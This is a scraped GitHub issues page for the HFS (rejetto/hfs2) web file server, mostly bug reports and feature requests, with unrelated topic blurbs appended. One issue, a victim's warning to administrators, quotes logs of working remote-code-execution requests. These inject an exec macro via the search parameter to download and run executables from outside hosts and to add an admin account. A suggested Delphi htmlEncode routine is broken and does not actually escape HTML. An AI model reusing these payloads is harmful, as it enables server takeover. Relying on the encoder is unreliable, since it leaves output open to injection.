rejetto / hfs2 Goto Github PK
View Code? Open in Web Editor NEWweb based file server
Home Page: https://rejetto.com/hfs
License: GNU General Public License v3.0
web based file server
Home Page: https://rejetto.com/hfs
License: GNU General Public License v3.0
The condition "if sizeOfFile(MACROS_LOG_FILE) = 0 then" is checking if the log file is empty before appending the new record. This can lead to an additional read of the file to check the size, which can be inefficient for large files. An alternative would be to keep a separate counter or use a global variable to check if this is the first time a record is being added and then add the log header if so.
const
HtmlEncodeChars: array[0..4] of record
Char: Char;
Code: string;
end = (
(Char: '<'; Code: '<'),
(Char: '>'; Code: '>'),
(Char: '&'; Code: '&'),
(Char: '"'; Code: '"'),
(Char: ''''; Code: ''')
);
function htmlEncode(const s: string): string;
var
i, j, len: integer;
begin
len := Length(s);
SetLength(Result, len * 6); // máximo tamanho possível após a conversão
j := 1;
for i := 1 to len do
begin
if s[i] < ' ' then // caracteres de controle
begin
Result[j] := '?';
Inc(j);
end
else
begin
case s[i] of
'<', '>', '&', '"', '''':
begin
Move(PChar(HtmlEncodeChars[s[i] = '<']).^, PChar(@Result[j])^, Length(HtmlEncodeChars[s[i] = '<']) * SizeOf(HtmlEncodeChars[0]));
Inc(j, Length(HtmlEncodeChars[s[i] = '<']));
end;
else
Result[j] := s[i];
Inc(j);
end;
end;
end;
SetLength(Result, j - 1);
end;
Create a constant called HtmlEncodeChars that contains a list of HTML characters and their HTML encoded equivalents.
I've defined an htmlEncode function that iterates through the characters in the input string, checks whether each character needs to be HTML-encoded, and then adds the encoded character to the result. This is done using the Move function to copy the corresponding HTML code into the result.
If the macrosLog method is called frequently over a short period of time, it can be useful to group multiple log entries into a single write to disk.
This can be done by adding a global variable that stores the last write time to disk and then checking that a sufficient amount of time has passed since the last disk write before writing the new log entry.
open directly in browser
function duplicated in menu
and mime types...
window.
the contents of mime types also are missing common already known files.
maybe the menu
one open directly in browser
can be integrated into mime types...
window
Line 5150 in 29f6bac
Would it be possible to add the hostname and current date in the TAR filename ?
Like example.com_20201010_home.folder.tar
Thanks,
want to try save vfs with 2.3m, because #20.
I found this line from 2.4RC7(which has newer theme) can't work with 2.3m. but the two versions just use the same symbols only, and the macros don't affect any <a>
tag of this section.
Line 422 in 29f6bac
checked documents, but found nothing about [+folder]
section means.
is there any quickfix for this issue? Thanks
on the web, hfs is using the file's modified time
as the info of the file.
But maybe hfs can use the time added to hfs' VFS for better sorting both on web and local ui to important the new files.
Another thought:
And both VFS window and log window displays left-right horizontal texts.
And if the window is not enough for the text(filename or URL path), then the texts get truncated.
So the VFS window and log window and log box window can use a stacked layout for a better view.
Greetings,
At the moment I am facing a problem and I would like to understand if it is due to the possible absence of an index or cache.
I have 98gb of 23,000 files in 3250 folders, when I search, it also takes 3-5 minutes before I get results.
I think it could be due to a lack of indexes, is it possible to implement improvements from this point of view? Like some modification in the template to use.
Or is it a code-side thing of the program?
Or am I doing something wrong?
hfs2.4RC06
Specs:
DL380 G6 | x2 cpu Xeon l5630;
Windows Server 2019 x64 DC LTSC;
32GB DDR3 1033mhz;
Files on HDD sata2 active (sata3 supported);
OS un SSD "";
Thanks in advance
We can test this on Linux using the following command:
ab -n 20000 -c 20 http://1.coco56.top/%E5%A4%A7%E5%9E%8B%E8%BD%AF%E4%BB%B6/
Sometimes the service does not respond. After a lot of files are transferred, the web page and other requests are not accepted, and the software functions are displayed normally. At this time, the service needs to be restarted to continue running. Here is a timer, 10 second interval, whether Will affect performance.
procedure TmainFrm.TimerTestTimer(Sender: TObject);
begin
if(not srv.active) then
begin
add2log('not active');
if assigned(srv) then srv.stop();
srv.port := port;
srv.start(listenOn);
end
else
begin
add2log('active');
end;
end;
My HFS file server (W10) has just been hacked : it's time to update, don't use old versions anymore !
This is some informations for administrators.
The hack looks like this one : rapid7/metasploit-framework#19240
(not https://www.exploit-db.com/exploits/49584 )
I noticed strange commands in HFS logs, that look like remote commands in Search box.
HFS Logs :
09/06/2024 11:20:44 146.70.200.117 44116 Connected
09/06/2024 11:20:44 146.70.200.117 44116 Requested GET /?n=
&cmd=ipconfig+/all&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESUTLT:{.?n.}{.^abc.}===={.?n.}
09/06/2024 18:14:17 164.90.160.59 59642 Requested GET /?n=
&cmd=nslookup+cpit4a9no3sf3j5nia3gjkq7s6mq4anoy.oast.online&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 08:06:56 165.227.68.140 60692 Connected
11/06/2024 08:06:56 165.227.68.140 60692 Requested GET /?n=
&cmd=cmd+/c+echo 505227774 > C:/Users/Public/Downloads/0&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}
11/06/2024 08:06:58 165.227.68.140 60694 Connected
11/06/2024 08:07:11 165.227.68.140 60694 Requested GET /?n=
&cmd=cmd+/c+powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://dpp-s3-data.s3.amazonaws.com/tpPNDWqMh5ubw','C:/Users/Public/Downloads/1.exe')&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}
11/06/2024 16:46:20 104.28.158.204 62279 Requested GET /?n=
&cmd=RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 16:46:20 104.28.153.15 14204 Requested GET /?n=
&cmd=certutil+-urlcache+-split+-f+http://39.101.122.168:889/RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 16:51:02 61.52.169.128 59799 Requested GET /?n=
&cmd=ipconfig&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:49:18 103.119.15.175 47684 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:49:18 103.119.15.175 47690 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//85.209.133.45%3A7598/dong.exe%27%29%29%22%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:53:25 43.205.207.16 60144 Requested GET /?n=
&cmd=ipconfig+/all&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:55:36 103.119.15.175 52008 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:55:36 103.119.15.175 52010 Requested GET /?n=%0A&cmd=bitsadmin.exe%20/transfer%20%22DownloadFile%22%20http%3A//85.209.133.45%3A7598/dong.exe%20%22%25CD%25%5Cdong.exe%22%20%26%26%20dong.exe&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 18:28:56 103.119.15.175 56406 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 18:28:56 103.119.15.175 56414 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//120.131.13.101%3A8080/index.php%27%29%29%22&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:37:49 103.119.15.175 47594 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:37:49 103.119.15.175 47606 Requested GET /?n=%0A&cmd=net%20localgroup%20Administrators%20wlccwlc%20/add&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:47:31 103.119.15.175 39702 Requested GET /?n=%0A&cmd=REG%20query%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%20Server%5CWinStations%5CRDP-Tcp%20/v%20PortNumber&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:57:17 103.119.15.175 34474 Connected
11/06/2024 20:57:17 103.119.15.175 34474 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Crash.exe+-OutFile+c:\users\public\Crash.exe&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 23:15:49 3.38.212.132 52953 Requested GET /?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/WindowsWatcher.key+-OutFile+c:\users\public\WindowsWatcher.key&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 23:16:04 3.38.212.132 52955 Requested GET /?n=
&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Roboform.dll+-OutFile+c:\users\public\Roboform.dll&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
Very simple, a user who doesn't have permission to download should also NOT view the contents of the folder in question. He actually gets a 401 error trying to access the folder. However, using the "deep Search" function it is able to find files and folders that were supposed to remain hidden.
This may be intentional (since it refers to a simple "disable downloading for the contents of this folder" instead of an actual "hide this folder and its contents and prevent viewing/downloading").
Anyway, thanks again 👍
A recent scan is triggering 16 different AV: https://www.virustotal.com/gui/file/42d14f9efe83cd9d695d0796232bd6e12d276c1262b6cf39d31cfcf64e128f11/detection
Can anything be done about this?
How to setup browsable to users only and file downlodable to everyone?
so if I use
domain.com/FOLDER - Only user can see who has access
domain.com/FOLDER/file.txt - can be seen and downloadable by everyone
IPv4 addresses are now exhausted. This have become one of the factors restricting the development of the Internet. The Chinese government and the ministry of industry and information technology are working hard on IPv6. So far, there are more than one billion IPv6 users in China. So there is an urgent need for applications that support IPv6.
As we all know, without a global network IP address, it is difficult for others to download to the files we have shared. And in many cases, they can only access the files by connecting to the same router as us.
I tried to download some 10k pictures with 150 get requests at the same time, and then some pictures were not loaded in more than ten seconds. Is there any restriction on high concurrency?
If 1 or more items are selected, regardless of their type, using the "Archive"
feature redirects to /~lib.js?mode=archive&recursive
instead of generating
a TAR archive and downloading it.
if the user window
has a user says name:a pwd:b
, then set /
point's access to the user a
, and choose one of many files in /
to use set user/pass
option to set name:c pwd:d
.
then go to the web to access the file using a:b
will get no permission
, using c:d
will get error username not found
.
I checked the web did send the right request with POST
. and the hfs UI loged the requests but without the form data. so guess may be an issue with the hfs server end.
ps. also found the delete(with rename) permission wouldn't work at all. What would delete and rename
option of the web do? will it delete/rename files just in vfs? or actually on disk?
Current browsers don't allow Cross-Origin Resource Sharing (CORS).
That's painful during development when using hfs to provide data-files.
For this hfs needs to provide the header
Access-Control-Allow-Origin: *
Could this be implemented, please?
Details:
https://web.dev/cross-origin-resource-sharing/
https://stackoverflow.com/questions/10636611/how-does-access-control-allow-origin-header-work
I need to switch between different usernames, but there's no function to logout.
Would you please add this function?
i got some issue with 2.4 RC7 :
1. hfs can't load web page with corectly ( seems like css or template) (run with wine on raspbery pi)
but 2.3m run working well no have issue css or template.
2. i can't set my local ip with http://192.x.x.x in hfs application. they are always use http://localhost. seems like 192.x.x.x gone in ip address menu by default. (run with wine on raspberry pi). but if i type manual 192.x.x.x:port in web browser it's still work.
im not using external ip.
version: hfs 2.4RC7 (Don't know if 2.3m has this issue.)
the hfs
usually has 1~2 folders, 100+ files.
the file size of the corrupted .vfs
usually is about 300bytes.
and via a text editor, can see only the first few(usually <10) items in the .vfs
file. all the others items are lost.
guess:
the filenames usually contain special characters, or chinese, or japanese. like ( ) [ ] { } ` & ~ @ _
.
the hfs has run > a few hours.
Dear author. Thank you for bringing such a convenient web file sharing server to the Internet,But now there is a big problem in the server, that is, the global public network IPv4 has been exhausted.At present, most broadband service providers always use nat-ipv4 to enable multiple users to share a public IPv4 address,Because dynamic DNS can only be realized on the basis that users directly hold a dynamic public network IPv4,Therefore, now individual users cannot use dynamic DNS to share their files with the outside world
However, now the new version 6 network protocol has become more and more mature, which has perfectly solved the problem of depletion of IPv4 in the global public network.
However, the new version 6 network protocol has become more and more mature, which has perfectly solved the problem of depletion of IPv4 in the global public network. At this stage, most of the leading broadband service providers have access to IPv6 network and promised to assign no less than / 60 prefix to individual users. However, some backward small broadband service providers have not yet access to IPv6 network, Therefore, I suggest that you should support dual protocol stack as soon as possible, that is, both V4 and V6. It not only facilitates the use of individual users who do not have public network V4 but have public network V6, but also facilitates users with only V4 network access to access the sharing stations provided by their friends.
Hi,
I found a bug, When I use cloudflare proxy, user can't login and when I turn it off. it works fine
The error that I get is "bad password" even when I am using correct pass. I tried using it without proxy and it worked fine.
Thanks
Hello,
Please note that the file is uploaded twice even a single post method is invoked (2.4.0 RC6).
00:49:15 127.0.0.1:50773 Connected
00:49:15 [email protected]:50773 Uploading EINVOICE-2021918922516830.PDF
00:49:15 [email protected]:50773 Fully uploaded EINVOICE-2021918922516830.PDF - 189.9 K @ 855.4 KB/s
00:49:15 [email protected]:50773 Disconnected by server - 52 bytes sent
00:49:15 127.0.0.1:50774 Connected
00:49:15 [email protected]:50774 Uploading EINVOICE-2021918922516830.PDF
00:49:16 [email protected]:50774 Fully uploaded EINVOICE-2021918922516830.PDF - 189.9 K @ 811.6 KB/s
00:49:16 [email protected]:50774 Requested POST /HFS/
00:49:16 [email protected]:50774 Request dump
> POST /HFS/ HTTP/1.1
> Connection: keep-alive
> Content-Type: multipart/form-data; boundary=--------101221004915412
> Content-Length: 194705
> Host: localhost
> User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
> Authorization: Basic VXNlcm5hbWU6UGFzc3dvcmQ=
00:49:19 [email protected]:50774 Disconnected - 139 bytes sent
Best regards.
the Delphi Community Edition currently seems completely broken: when signing up, you get an email with a serial-code, and when trying to use that serial-code during installation, it will say
No valid license information found for Embarcadero Delphi 10.4. You must provide a valid serial number(blablabla)
and when trying to email [email protected]
about the issue, you get an error
550 5.1.1 The email account that you tried to reach does not exist. Please try double-checking the recipient's email address for typos or unnecessary spaces.
so yeah... seems Delphi Community Edition is not currently an option.. Anyone tried compiling it on Free Pascal?
Hey Rejetto,
I've been trying out HFS for the last couple days. It's been working great. Nice work!
I was curious if this 5 year old post about remote execution is still valid.
Thanks!
between
and between!
macros in alias.txt
are broken. There are pairs of .}
missing, which should be there to close {.and
.
They should be:
between=if|{.$1 < $3.}|{:{.and|{.$1 <= $2.}|{.$2 <= $3.}.}:}|{:{.and|{.$3 <= $2.}|{.$2 <= $1.}.}:}
between!=if|{.$1 < $3.}|{:{.and|{.$1 < $2.}|{.$2 < $3.}.}:}|{:{.and|{.$3 < $2.}|{.$2 < $1.}.}:}
Fix it ;)
Hi there @rejetto, I have had HFS 2.3.x and 2.4.x running on two of my servers. Today I wanted to share some files, so I tried to open it from the tray bar, however, it seems that the .exe
file is gone on both servers!
Is this something intentional (maybe you added it because of the recent RCE exploit)? Or is it something that I need to be concerned about, maybe the servers are infected? 😲
I would appreciate some clarification!
Hi,
I have used the custom ip option and added my domain then used cloudflare to show it but i tis not working.
do you know why?
I have used port 12400
is it related to that?
Thanks
wanted to update the vfs file via python and other languages for convenience.
I tried blow with python.
for _ in range(900):
try:
print(zlib.decompress(a[_:].decode('utf8')+b'\0'))
except:
pass
but failed to parse the compressed vfs file. It seems that the data after the header part within the .vfs file is not compressed by zlib.
is it able to add wiki for how the struct of vfs file works?
redirects to undefined (temporary fix: replace undefined with '')
ERROR:crash_report_database_win.cc(469)] failed to stat report
HFS.Libraries, Where can I download this library file? The forum downloads the old version.
I want to built it by myself.
I
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.